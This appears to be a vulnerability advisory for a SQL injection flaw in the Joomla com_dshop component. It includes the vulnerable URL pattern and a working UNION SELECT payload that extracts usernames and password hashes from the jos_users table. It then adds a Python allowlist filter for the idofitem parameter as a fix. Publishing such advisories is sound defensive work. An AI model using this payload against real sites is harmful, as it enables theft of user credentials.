Joomla component (com_dshop) SQL injection flaw and fix

2011-12-22T00:00:00
ID MYHACK58:62201132675
Type myhack58
Reporter Anonymous
Modified 2011-12-22T00:00:00

Description

Title: Joomla Component (com_dshop) SQL Injection Vulnerability

Author: CoBRa_21 www.badguest.cn uyku_cu [at] windowslive.com

Level: high risk

SQL injection flaw

http://www.badguest.cn/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=1 2 (SQL)

Test example

+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users

Fix:

Filter the input parameters passed to the page.
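
One way to implement the filtering named in the fix, as an added example that is not from the advisory or the component's own code: an allowlist check that accepts `idofitem` only when it is a plain integer, applied to request URLs for `com_dshop`. The host `example.test`, the function names and the sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allowlist: the item id must be a short run of ASCII digits and nothing else.
_ID_RE = re.compile(r"[0-9]{1,10}")

def filter_idofitem(raw):
    """Return the id as an int, or None if the value is not a plain integer."""
    if raw is None or not _ID_RE.fullmatch(raw):
        return None
    return int(raw)

def check_request(url):
    """Classify one request URL as 'ignore', 'ok' or 'reject'."""
    # parse_qs decodes %xx escapes and '+', so encoded input is checked decoded.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if query.get("option") != ["com_dshop"]:
        return "ignore"                      # request is for another component
    values = query.get("idofitem", [])
    if not values:
        return "ok"                          # no item id supplied, nothing to filter
    # A repeated parameter is rejected as well: which copy the application
    # reads is ambiguous, so it cannot be validated reliably.
    if len(values) != 1 or filter_idofitem(values[0]) is None:
        return "reject"
    return "ok"

# Constructed sample requests; the second carries the advisory's test string.
BASE = ("http://example.test/index.php?option=com_dshop"
        "&controller=fpage&task=flypage&idofitem=")
SAMPLES = [
    BASE + "12",
    BASE + "12+union+select+0,1,2,group_concat(username,0x3a,password)"
           ",4,5,6,7+from+jos_users",
    BASE + "12%27",
    BASE + "12&idofitem=13",
    "http://example.test/index.php?option=com_content&id=5",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_request(url), url)
```

A rejected value should never reach the SQL statement; the validated integer is what gets bound into the query.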